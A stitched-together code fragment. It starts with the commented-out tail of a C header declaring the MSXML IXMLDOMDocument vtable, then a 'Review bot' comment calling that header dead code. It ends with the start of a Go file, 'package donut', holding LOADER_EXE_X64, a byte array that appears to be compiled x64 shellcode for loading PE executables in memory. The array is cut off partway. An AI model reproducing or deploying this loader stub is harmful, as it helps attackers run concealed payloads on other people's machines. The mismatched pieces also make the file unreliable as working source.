400 HRESULT ( STDMETHODCALLTYPE *transformNode )(
401 IXMLDOMDocument * This,
402 IXMLDOMNode *stylesheet,
403 BSTR *xmlString);
404
405 HRESULT ( STDMETHODCALLTYPE *selectNodes )(
406 IXMLDOMDocument * This,
407 BSTR queryString,
408 IXMLDOMNodeList **resultList);
409
410 HRESULT ( STDMETHODCALLTYPE *selectSingleNode )(
411 IXMLDOMDocument * This,
412 BSTR queryString,
413 IXMLDOMNode **resultNode);
414
415 HRESULT ( STDMETHODCALLTYPE *get_parsed )(
416 IXMLDOMDocument * This,
417 VARIANT_BOOL *isParsed);
418
419 HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )(
420 IXMLDOMDocument * This,
421 BSTR *namespaceURI);
422
423 HRESULT ( STDMETHODCALLTYPE *get_prefix )(
424 IXMLDOMDocument * This,
425 BSTR *prefixString);
426
427 HRESULT ( STDMETHODCALLTYPE *get_baseName )(
428 IXMLDOMDocument * This,
429 BSTR *nameString);
430
431 HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )(
432 IXMLDOMDocument * This,
433 IXMLDOMNode *stylesheet,
434 VARIANT outputObject);
435
436 HRESULT ( STDMETHODCALLTYPE *get_doctype )(
437 IXMLDOMDocument * This,
438 IXMLDOMDocumentType **documentType);
439
440 HRESULT ( STDMETHODCALLTYPE *get_implementation )(
441 IXMLDOMDocument * This,
442 IXMLDOMImplementation **impl);
443
444 HRESULT ( STDMETHODCALLTYPE *get_documentElement )(
445 IXMLDOMDocument * This,
446 IXMLDOMElement **DOMElement);
447
448 HRESULT ( STDMETHODCALLTYPE *putref_documentElement )(
449 IXMLDOMDocument * This,
450 IXMLDOMElement *DOMElement);
451
452 HRESULT ( STDMETHODCALLTYPE *createElement )(
453 IXMLDOMDocument * This,
454 BSTR tagName,
455 IXMLDOMElement **element);
456
457 HRESULT ( STDMETHODCALLTYPE *createDocumentFragment )(
458 IXMLDOMDocument * This,
459 IXMLDOMDocumentFragment **docFrag);
460
461 HRESULT ( STDMETHODCALLTYPE *createTextNode )(
462 IXMLDOMDocument * This,
463 BSTR data,
464 IXMLDOMText **text);
465
466 HRESULT ( STDMETHODCALLTYPE *createComment )(
467 IXMLDOMDocument * This,
468 BSTR data,
469 IXMLDOMComment **comment);
470
471 HRESULT ( STDMETHODCALLTYPE *createCDATASection )(
472 IXMLDOMDocument * This,
473 BSTR data,
474 IXMLDOMCDATASection **cdata);
475
476 HRESULT ( STDMETHODCALLTYPE *createProcessingInstruction )(
477 IXMLDOMDocument * This,
478 BSTR target,
479 BSTR data,
480 IXMLDOMProcessingInstruction **pi);
481
482 HRESULT ( STDMETHODCALLTYPE *createAttribute )(
483 IXMLDOMDocument * This,
484 BSTR name,
485 IXMLDOMAttribute **attribute);
486
487 HRESULT ( STDMETHODCALLTYPE *createEntityReference )(
488 IXMLDOMDocument * This,
489 BSTR name,
490 IXMLDOMEntityReference **entityRef);
491
492 HRESULT ( STDMETHODCALLTYPE *getElementsByTagName )(
493 IXMLDOMDocument * This,
494 BSTR tagName,
495 IXMLDOMNodeList **resultList);
496
497 HRESULT ( STDMETHODCALLTYPE *createNode )(
498 IXMLDOMDocument * This,
499 VARIANT Type,
500 BSTR name,
501 BSTR namespaceURI,
502 IXMLDOMNode **node);
503
504 HRESULT ( STDMETHODCALLTYPE *nodeFromID )(
505 IXMLDOMDocument * This,
506 BSTR idString,
507 IXMLDOMNode **node);
508
509 HRESULT ( STDMETHODCALLTYPE *load )(
510 IXMLDOMDocument * This,
511 VARIANT xmlSource,
512 VARIANT_BOOL *isSuccessful);
513
514 HRESULT ( STDMETHODCALLTYPE *get_readyState )(
515 IXMLDOMDocument * This,
516 long *value);
517
518 HRESULT ( STDMETHODCALLTYPE *get_parseError )(
519 IXMLDOMDocument * This,
520 IXMLDOMParseError **errorObj);
521
522 HRESULT ( STDMETHODCALLTYPE *get_url )(
523 IXMLDOMDocument * This,
524 BSTR *urlString);
525
526 HRESULT ( STDMETHODCALLTYPE *get_async )(
527 IXMLDOMDocument * This,
528 VARIANT_BOOL *isAsync);
529
530 HRESULT ( STDMETHODCALLTYPE *put_async )(
531 IXMLDOMDocument * This,
532 VARIANT_BOOL isAsync);
533
534 HRESULT ( STDMETHODCALLTYPE *abort )(
535 IXMLDOMDocument * This);
536
537 HRESULT ( STDMETHODCALLTYPE *loadXML )(
538 IXMLDOMDocument * This,
539 BSTR bstrXML,
540 VARIANT_BOOL *isSuccessful);
541
542 HRESULT ( STDMETHODCALLTYPE *save )(
543 IXMLDOMDocument * This,
544 VARIANT destination);
545
546 HRESULT ( STDMETHODCALLTYPE *get_validateOnParse )(
547 IXMLDOMDocument * This,
548 VARIANT_BOOL *isValidating);
549
550 HRESULT ( STDMETHODCALLTYPE *put_validateOnParse )(
551 IXMLDOMDocument * This,
552 VARIANT_BOOL isValidating);
553
554 HRESULT ( STDMETHODCALLTYPE *get_resolveExternals )(
555 IXMLDOMDocument * This,
556 VARIANT_BOOL *isResolving);
557
558 HRESULT ( STDMETHODCALLTYPE *put_resolveExternals )(
559 IXMLDOMDocument * This,
560 VARIANT_BOOL isResolving);
561
562 HRESULT ( STDMETHODCALLTYPE *get_preserveWhiteSpace )(
563 IXMLDOMDocument * This,
564 VARIANT_BOOL *isPreserving);
565
566 HRESULT ( STDMETHODCALLTYPE *put_preserveWhiteSpace )(
567 IXMLDOMDocument * This,
568 VARIANT_BOOL isPreserving);
569
570 HRESULT ( STDMETHODCALLTYPE *put_onreadystatechange )(
571 IXMLDOMDocument * This,
572 VARIANT readystatechangeSink);
573
574 HRESULT ( STDMETHODCALLTYPE *put_ondataavailable )(
575 IXMLDOMDocument * This,
576 VARIANT ondataavailableSink);
577
578 HRESULT ( STDMETHODCALLTYPE *put_ontransformnode )(
579 IXMLDOMDocument * This,
580 VARIANT ontransformnodeSink);
581
582 END_INTERFACE
583 } IXMLDOMDocumentVtbl;
584
585 typedef struct _IXMLDOMDocument {
586 IXMLDOMDocumentVtbl *lpVtbl;
587 } XMLDomDocument;*/
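Review bot: Everything after the license header in this file is one `/** ... */` block, opened at gutter line 31 and only closed on the final `} XMLDomDocument;*/` line, so the IXMLDOMNodeVtbl and IXMLDOMDocumentVtbl definitions and both struct typedefs are never compiled and the file adds nothing to the build. If the MSXML declarations are still needed they should be re-enabled and placed under an include guard (the preceding header closes with `#endif`, this one has no guard at all); otherwise the file is dead code and should be dropped rather than carried into the package. Two details would need attention if the block is ever restored: `__RPC__deref_out void **ppvObject` in `QueryInterface` keeps an IDL-style annotation that appears on no other method and is preceded by a stray blank line, and the typedef names are inconsistent (`_IXMLDOMNode` → `XMLDOMNode` versus `_IXMLDOMDocument` → `XMLDomDocument`), which invites a mismatch with callers that spell the type the usual `IXMLDOMDocument` way.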
0 package donut
1
2 // LOADER_EXE_X64 - stub for EXE PE files
3 var LOADER_EXE_X64 = []byte{
4
5 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x6c, 0x24, 0x10, 0x48, 0x89,
6 0x74, 0x24, 0x18, 0x57, 0x48, 0x81, 0xec, 0x00, 0x05, 0x00, 0x00, 0x33,
7 0xff, 0x48, 0x8b, 0xd9, 0x48, 0x39, 0xb9, 0x38, 0x02, 0x00, 0x00, 0x0f,
8 0x84, 0xc0, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0x41, 0x28, 0x48, 0x8b, 0x91,
9 0x88, 0x00, 0x00, 0x00, 0xe8, 0xbb, 0x23, 0x00, 0x00, 0x48, 0x85, 0xc0,
10 0x0f, 0x84, 0xa1, 0x00, 0x00, 0x00, 0x48, 0x21, 0x7c, 0x24, 0x28, 0x4c,
11 0x8d, 0x05, 0x26, 0x11, 0x00, 0x00, 0x21, 0x7c, 0x24, 0x20, 0x4c, 0x8b,
12 0xcb, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0xd0, 0x4c, 0x8b, 0x43, 0x28, 0x48,
13 0x8b, 0xcb, 0x48, 0x8b, 0x93, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xf8,
14 0xe8, 0x83, 0x23, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48, 0x8b, 0xcb,
15 0x48, 0x8b, 0x93, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xe8, 0xe8, 0x6d,
16 0x23, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48, 0x8b, 0xcb, 0x48, 0x8b,
17 0x93, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0xe8, 0x57, 0x23, 0x00,
18 0x00, 0x48, 0x85, 0xed, 0x74, 0x4c, 0x48, 0x85, 0xf6, 0x74, 0x47, 0x48,
19 0x85, 0xc0, 0x74, 0x42, 0xc7, 0x44, 0x24, 0x60, 0x0b, 0x00, 0x10, 0x00,
20 0xff, 0xd0, 0x48, 0x8b, 0xc8, 0x48, 0x8d, 0x54, 0x24, 0x30, 0xff, 0xd6,
21 0x48, 0x8b, 0x83, 0x38, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x4c, 0x24, 0x30,
22 0x48, 0x83, 0xa4, 0x24, 0xc8, 0x00, 0x00, 0x00, 0xf0, 0x33, 0xd2, 0x48,
23 0x89, 0x84, 0x24, 0x28, 0x01, 0x00, 0x00, 0xff, 0xd5, 0xeb, 0x0b, 0x48,
24 0x83, 0xc8, 0xff, 0xeb, 0x08, 0xe8, 0x86, 0x10, 0x00, 0x00, 0x48, 0x8b,
25 0xc7, 0x4c, 0x8d, 0x9c, 0x24, 0x00, 0x05, 0x00, 0x00, 0x49, 0x8b, 0x5b,
26 0x10, 0x49, 0x8b, 0x6b, 0x18, 0x49, 0x8b, 0x73, 0x20, 0x49, 0x8b, 0xe3,
27 0x5f, 0xc3, 0xcc, 0xcc, 0xf0, 0xff, 0x41, 0x08, 0x8b, 0x41, 0x08, 0xc3,
28 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc3, 0xcc, 0xcc, 0x4d, 0x85, 0xc0, 0x75,
29 0x06, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xc3, 0x4c, 0x8b, 0x49, 0x10, 0x49,
30 0x8b, 0x81, 0xf4, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75, 0x0d, 0x49,
31 0x8b, 0x81, 0xfc, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08, 0x74, 0x19,
32 0x49, 0x8b, 0x81, 0xb4, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75, 0x17,
33 0x49, 0x8b, 0x81, 0xbc, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08, 0x75,
34 0x0a, 0x49, 0x89, 0x08, 0xf0, 0xff, 0x41, 0x08, 0x33, 0xc0, 0xc3, 0x49,
35 0x83, 0x20, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0xc3, 0xcc, 0xcc, 0xcc,
36 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x08, 0xff, 0xc8, 0xc3, 0xcc,
37 0x33, 0xc0, 0xc3, 0xcc, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x6c,
38 0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x18, 0x57, 0x48, 0x83, 0xec, 0x20,
39 0x49, 0x8b, 0xf9, 0x41, 0x8b, 0xe8, 0x48, 0x8b, 0xf1, 0x41, 0xf6, 0xc0,
40 0x02, 0x74, 0x1b, 0x48, 0x8b, 0x5c, 0x24, 0x50, 0x48, 0x85, 0xdb, 0x74,
41 0x1c, 0x48, 0x8b, 0x49, 0x38, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x08, 0x48,
42 0x8b, 0x46, 0x38, 0x48, 0x89, 0x03, 0x40, 0xf6, 0xc5, 0x01, 0x74, 0x1c,
43 0x48, 0x85, 0xff, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x12,
44 0x48, 0x8d, 0x5e, 0x28, 0x48, 0x8b, 0x03, 0x48, 0x8b, 0xcb, 0xff, 0x50,
45 0x08, 0x48, 0x89, 0x1f, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x30, 0x48,
46 0x8b, 0x6c, 0x24, 0x38, 0x48, 0x8b, 0x74, 0x24, 0x40, 0x48, 0x83, 0xc4,
47 0x20, 0x5f, 0xc3, 0xcc, 0x40, 0x53, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b,
48 0x41, 0x58, 0x48, 0x8b, 0xda, 0xff, 0x50, 0x78, 0x89, 0x03, 0x33, 0xc0,
49 0x48, 0x83, 0xc4, 0x20, 0x5b, 0xc3, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x53,
50 0x48, 0x83, 0xec, 0x60, 0x83, 0x60, 0x20, 0x00, 0x48, 0x8d, 0x48, 0xb8,
51 0x83, 0x60, 0x18, 0x00, 0x48, 0x8b, 0xda, 0x83, 0x60, 0x10, 0x00, 0x33,
52 0xd2, 0x44, 0x8d, 0x42, 0x40, 0xe8, 0x2a, 0x27, 0x00, 0x00, 0x48, 0x8b,
53 0x03, 0x48, 0x8d, 0x54, 0x24, 0x20, 0x48, 0x8b, 0xcb, 0xff, 0x50, 0x18,
54 0x85, 0xc0, 0x75, 0x1e, 0x48, 0x8b, 0x03, 0x4c, 0x8d, 0x4c, 0x24, 0x78,
55 0x4c, 0x8d, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0x48,
56 0x8d, 0x94, 0x24, 0x88, 0x00, 0x00, 0x00, 0xff, 0x50, 0x20, 0x33, 0xc0,
57 0x48, 0x83, 0xc4, 0x60, 0x5b, 0xc3, 0xcc, 0xcc, 0x4d, 0x8b, 0xc8, 0x4d,
58 0x85, 0xc0, 0x75, 0x06, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xc3, 0x4c, 0x8b,
59 0x41, 0x58, 0x49, 0x8b, 0x80, 0xf4, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x02,
60 0x75, 0x0d, 0x49, 0x8b, 0x80, 0xfc, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x42,
61 0x08, 0x74, 0x19, 0x49, 0x8b, 0x80, 0xa4, 0x06, 0x00, 0x00, 0x48, 0x3b,
62 0x02, 0x75, 0x16, 0x49, 0x8b, 0x80, 0xac, 0x06, 0x00, 0x00, 0x48, 0x3b,
63 0x42, 0x08, 0x75, 0x09, 0x49, 0x89, 0x09, 0xf0, 0xff, 0x41, 0x08, 0xeb,
64 0x24, 0x49, 0x8b, 0x80, 0xb4, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75,
65 0x1b, 0x49, 0x8b, 0x80, 0xbc, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08,
66 0x75, 0x0e, 0x48, 0x8d, 0x41, 0x10, 0x49, 0x89, 0x01, 0xf0, 0xff, 0x41,
67 0x18, 0x33, 0xc0, 0xc3, 0x49, 0x83, 0x21, 0x00, 0xb8, 0x02, 0x40, 0x00,
68 0x80, 0xc3, 0xcc, 0xcc, 0x48, 0x8b, 0x44, 0x24, 0x30, 0x83, 0x20, 0x00,
69 0x33, 0xc0, 0xc3, 0xcc, 0x0f, 0xaf, 0xca, 0x8b, 0xc1, 0xc3, 0xcc, 0xcc,
70 0x48, 0x8b, 0x44, 0x24, 0x28, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc3, 0xcc,
71 0x8d, 0x04, 0x11, 0xc3, 0x48, 0x89, 0x5c, 0x24, 0x18, 0x55, 0x56, 0x57,
72 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b, 0xd9, 0x48,
73 0x81, 0xc1, 0x58, 0x03, 0x00, 0x00, 0xff, 0x53, 0x30, 0x48, 0x8b, 0xf0,
74 0x48, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xe9, 0xd7,
75 0x00, 0x00, 0x00, 0x48, 0x8d, 0x93, 0xc0, 0x05, 0x00, 0x00, 0x48, 0x8b,
76 0xce, 0xff, 0x53, 0x38, 0x48, 0x8b, 0xe8, 0x48, 0x85, 0xc0, 0x0f, 0x84,
77 0xbc, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x3d, 0x99, 0xff, 0xff, 0xff, 0x4c,
78 0x8d, 0x3d, 0x86, 0xff, 0xff, 0xff, 0x41, 0x2b, 0xff, 0x0f, 0x88, 0xa5,
79 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4c, 0x24, 0x50, 0x8b, 0xd7, 0x41, 0xb8,
80 0x40, 0x00, 0x00, 0x00, 0x44, 0x8b, 0xf7, 0x48, 0x8b, 0xc8, 0xff, 0x53,
81 0x60, 0x85, 0xc0, 0x0f, 0x84, 0x87, 0x00, 0x00, 0x00, 0x44, 0x8b, 0xc7,
82 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xcd, 0xe8, 0xa1, 0x25, 0x00, 0x00, 0x44,
83 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d, 0x4c, 0x24, 0x58, 0x41, 0x8b, 0xd6,
84 0x48, 0x8b, 0xcd, 0xff, 0x53, 0x60, 0x48, 0x8d, 0x93, 0xd0, 0x05, 0x00,
85 0x00, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x38, 0x48, 0x8b, 0xf0, 0x48, 0x85,
86 0xc0, 0x74, 0x51, 0x48, 0x8d, 0x3d, 0x42, 0xff, 0xff, 0xff, 0x4c, 0x8d,
87 0x35, 0x2f, 0xff, 0xff, 0xff, 0x41, 0x2b, 0xfe, 0x78, 0x3e, 0x4c, 0x8d,
88 0x4c, 0x24, 0x50, 0x8b, 0xd7, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0x8b,
89 0xef, 0x48, 0x8b, 0xc8, 0xff, 0x53, 0x60, 0x85, 0xc0, 0x74, 0x25, 0x44,
90 0x8b, 0xc7, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xce, 0xe8, 0x3f, 0x25, 0x00,
91 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d, 0x4c, 0x24, 0x58, 0x8b,
92 0xd5, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x60, 0xe9, 0x21, 0xff, 0xff, 0xff,
93 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48, 0x83, 0xc4, 0x20, 0x41,
94 0x5f, 0x41, 0x5e, 0x5f, 0x5e, 0x5d, 0xc3, 0xcc, 0x48, 0x89, 0x5c, 0x24,
95 0x18, 0x55, 0x56, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xec, 0x20,
96 0x48, 0x8b, 0xd9, 0x48, 0x81, 0xc1, 0x64, 0x03, 0x00, 0x00, 0xff, 0x53,
97 0x30, 0x48, 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x01, 0x00,
98 0x00, 0x00, 0xe9, 0xd7, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x93, 0x70, 0x05,
99 0x00, 0x00, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x38, 0x48, 0x8b, 0xe8, 0x48,
100 0x85, 0xc0, 0x0f, 0x84, 0xbc, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x3d, 0x65,
101 0x1f, 0x00, 0x00, 0x4c, 0x8d, 0x3d, 0xf6, 0xfc, 0xff, 0xff, 0x41, 0x2b,
102 0xff, 0x0f, 0x88, 0xa5, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4c, 0x24, 0x50,
103 0x8b, 0xd7, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0x44, 0x8b, 0xf7, 0x48,
104 0x8b, 0xc8, 0xff, 0x53, 0x60, 0x85, 0xc0, 0x0f, 0x84, 0x87, 0x00, 0x00,
105 0x00, 0x44, 0x8b, 0xc7, 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xcd, 0xe8, 0x89,
106 0x24, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d, 0x4c, 0x24,
107 0x58, 0x41, 0x8b, 0xd6, 0x48, 0x8b, 0xcd, 0xff, 0x53, 0x60, 0x48, 0x8d,
108 0x93, 0x90, 0x05, 0x00, 0x00, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x38, 0x48,
109 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x74, 0x51, 0x48, 0x8d, 0x3d, 0xf2, 0x1e,
110 0x00, 0x00, 0x4c, 0x8d, 0x35, 0xdf, 0x1e, 0x00, 0x00, 0x41, 0x2b, 0xfe,
111 0x78, 0x3e, 0x4c, 0x8d, 0x4c, 0x24, 0x50, 0x8b, 0xd7, 0x41, 0xb8, 0x40,
112 0x00, 0x00, 0x00, 0x8b, 0xef, 0x48, 0x8b, 0xc8, 0xff, 0x53, 0x60, 0x85,
113 0xc0, 0x74, 0x25, 0x44, 0x8b, 0xc7, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xce,
114 0xe8, 0x27, 0x24, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d,
115 0x4c, 0x24, 0x58, 0x8b, 0xd5, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x60, 0xe9,
116 0x21, 0xff, 0xff, 0xff, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48,
117 0x83, 0xc4, 0x20, 0x41, 0x5f, 0x41, 0x5e, 0x5f, 0x5e, 0x5d, 0xc3, 0xcc,
118 0x40, 0x55, 0x53, 0x56, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41,
119 0x57, 0x48, 0x8d, 0xac, 0x24, 0x48, 0xfe, 0xff, 0xff, 0x48, 0x81, 0xec,
120 0xb8, 0x02, 0x00, 0x00, 0x83, 0xa5, 0x08, 0x02, 0x00, 0x00, 0x00, 0x48,
121 0x8b, 0xf9, 0x45, 0x33, 0xf6, 0x48, 0x8d, 0x4c, 0x24, 0x40, 0x33, 0xd2,
122 0xbe, 0x00, 0x02, 0x60, 0x84, 0x41, 0x8d, 0x5e, 0x68, 0x44, 0x8b, 0xc3,
123 0xe8, 0xdb, 0x23, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xb0, 0x89, 0x5c, 0x24,
124 0x40, 0x48, 0x89, 0x44, 0x24, 0x58, 0x48, 0x8d, 0x8f, 0xe8, 0x06, 0x00,
125 0x00, 0x48, 0x8d, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x33, 0xd2, 0x48, 0x89,
126 0x45, 0x88, 0x4c, 0x8d, 0x4c, 0x24, 0x40, 0xb8, 0x00, 0x01, 0x00, 0x00,
127 0x41, 0xb8, 0x00, 0x00, 0x00, 0x10, 0x89, 0x44, 0x24, 0x60, 0x89, 0x45,
128 0x90, 0xff, 0x97, 0xf0, 0x00, 0x00, 0x00, 0x33, 0xdb, 0x85, 0xc0, 0x0f,
129 0x84, 0x16, 0x02, 0x00, 0x00, 0x83, 0x7c, 0x24, 0x54, 0x04, 0xb8, 0x00,
130 0x32, 0xe0, 0x84, 0x44, 0x8b, 0xe3, 0x89, 0x5c, 0x24, 0x20, 0x41, 0x0f,
131 0x94, 0xc4, 0x0f, 0x44, 0xf0, 0x45, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0x33,
132 0xd2, 0x33, 0xc9, 0xff, 0x97, 0xf8, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0xe8,
133 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xe2, 0x01, 0x00, 0x00, 0x44, 0x0f, 0xb7,
134 0x44, 0x24, 0x64, 0x48, 0x8d, 0x55, 0xb0, 0x48, 0x89, 0x5c, 0x24, 0x38,
135 0x45, 0x33, 0xc9, 0x89, 0x5c, 0x24, 0x30, 0x48, 0x8b, 0xc8, 0xc7, 0x44,
136 0x24, 0x28, 0x03, 0x00, 0x00, 0x00, 0x48, 0x89, 0x5c, 0x24, 0x20, 0xff,
137 0x97, 0x00, 0x01, 0x00, 0x00, 0x4c, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x0f,
138 0x84, 0x51, 0x01, 0x00, 0x00, 0x48, 0x89, 0x5c, 0x24, 0x38, 0x48, 0x8d,
139 0x97, 0xe8, 0x07, 0x00, 0x00, 0x89, 0x74, 0x24, 0x30, 0x4c, 0x8d, 0x85,
140 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x5c, 0x24, 0x28, 0x45, 0x33, 0xc9,
141 0x48, 0x8b, 0xc8, 0x48, 0x89, 0x5c, 0x24, 0x20, 0xff, 0x97, 0x20, 0x01,
142 0x00, 0x00, 0x48, 0x8b, 0xd8, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x0f, 0x01,
143 0x00, 0x00, 0x45, 0x85, 0xe4, 0x74, 0x28, 0x0f, 0xba, 0xe6, 0x0c, 0x73,
144 0x22, 0x45, 0x8d, 0x4e, 0x04, 0xc7, 0x85, 0x10, 0x02, 0x00, 0x00, 0x80,
145 0x33, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b,
146 0xc8, 0x41, 0x8d, 0x56, 0x1f, 0xff, 0x97, 0x08, 0x01, 0x00, 0x00, 0x45,
147 0x33, 0xe4, 0x45, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0x44, 0x89, 0x64, 0x24,
148 0x20, 0x33, 0xd2, 0x48, 0x8b, 0xcb, 0xff, 0x97, 0x28, 0x01, 0x00, 0x00,
149 0x85, 0xc0, 0x0f, 0x84, 0xb8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x8d, 0x00,
150 0x02, 0x00, 0x00, 0xc7, 0x85, 0x00, 0x02, 0x00, 0x00, 0x04, 0x00, 0x00,
151 0x00, 0x4c, 0x8d, 0x85, 0x08, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x64, 0x24,
152 0x20, 0xba, 0x13, 0x00, 0x00, 0x20, 0x48, 0x8b, 0xcb, 0xff, 0x97, 0x30,
153 0x01, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x85, 0x00, 0x00, 0x00, 0x81,
154 0xbd, 0x08, 0x02, 0x00, 0x00, 0xc8, 0x00, 0x00, 0x00, 0x75, 0x79, 0x48,
155 0x8d, 0xb7, 0x18, 0x09, 0x00, 0x00, 0xc7, 0x85, 0x00, 0x02, 0x00, 0x00,
156 0x08, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0xc6, 0x4c, 0x89, 0x26, 0x4c, 0x8d,
157 0x8d, 0x00, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x64, 0x24, 0x20, 0xba, 0x05,
158 0x00, 0x00, 0x20, 0x48, 0x8b, 0xcb, 0xff, 0x97, 0x30, 0x01, 0x00, 0x00,
159 0x85, 0xc0, 0x74, 0x44, 0x48, 0x8b, 0x16, 0x48, 0x85, 0xd2, 0x74, 0x3c,
160 0x33, 0xc9, 0x45, 0x8d, 0x4c, 0x24, 0x04, 0x41, 0xb8, 0x00, 0x30, 0x00,
161 0x00, 0xff, 0x57, 0x48, 0x48, 0x89, 0x87, 0x20, 0x09, 0x00, 0x00, 0x48,
162 0x85, 0xc0, 0x74, 0x20, 0x44, 0x8b, 0x06, 0x4c, 0x8d, 0x8d, 0x18, 0x02,
163 0x00, 0x00, 0x48, 0x8b, 0xd0, 0x44, 0x89, 0xa5, 0x18, 0x02, 0x00, 0x00,
164 0x48, 0x8b, 0xcb, 0xff, 0x97, 0x10, 0x01, 0x00, 0x00, 0x44, 0x8b, 0xf0,
165 0x48, 0x8b, 0xcb, 0xff, 0x97, 0x18, 0x01, 0x00, 0x00, 0x49, 0x8b, 0xcf,
166 0xff, 0x97, 0x18, 0x01, 0x00, 0x00, 0x49, 0x8b, 0xcd, 0xff, 0x97, 0x18,
167 0x01, 0x00, 0x00, 0x45, 0x85, 0xf6, 0x74, 0x46, 0x83, 0xbf, 0x34, 0x02,
168 0x00, 0x00, 0x03, 0x75, 0x3d, 0x48, 0x8b, 0x9f, 0x20, 0x09, 0x00, 0x00,
169 0x48, 0x8d, 0x97, 0x08, 0x09, 0x00, 0x00, 0x44, 0x8b, 0x8f, 0x18, 0x09,
170 0x00, 0x00, 0x48, 0x8d, 0x8f, 0xf8, 0x08, 0x00, 0x00, 0x4c, 0x8b, 0xc3,
171 0xe8, 0xe3, 0x1d, 0x00, 0x00, 0x48, 0x8b, 0x57, 0x28, 0x48, 0x8d, 0x8f,
172 0xf0, 0x07, 0x00, 0x00, 0xe8, 0x8b, 0x1c, 0x00, 0x00, 0x48, 0x3b, 0x83,
173 0x18, 0x05, 0x00, 0x00, 0x75, 0x05, 0x41, 0x8b, 0xc6, 0xeb, 0x02, 0x33,
174 0xc0, 0x48, 0x81, 0xc4, 0xb8, 0x02, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e,
175 0x41, 0x5d, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0x5d, 0xc3, 0xcc, 0xcc, 0xcc,
176 0x48, 0x89, 0x5c, 0x24, 0x08, 0x4c, 0x89, 0x44, 0x24, 0x18, 0x55, 0x56,
177 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8d, 0xac,
178 0x24, 0xf0, 0xfe, 0xff, 0xff, 0x48, 0x81, 0xec, 0x10, 0x02, 0x00, 0x00,
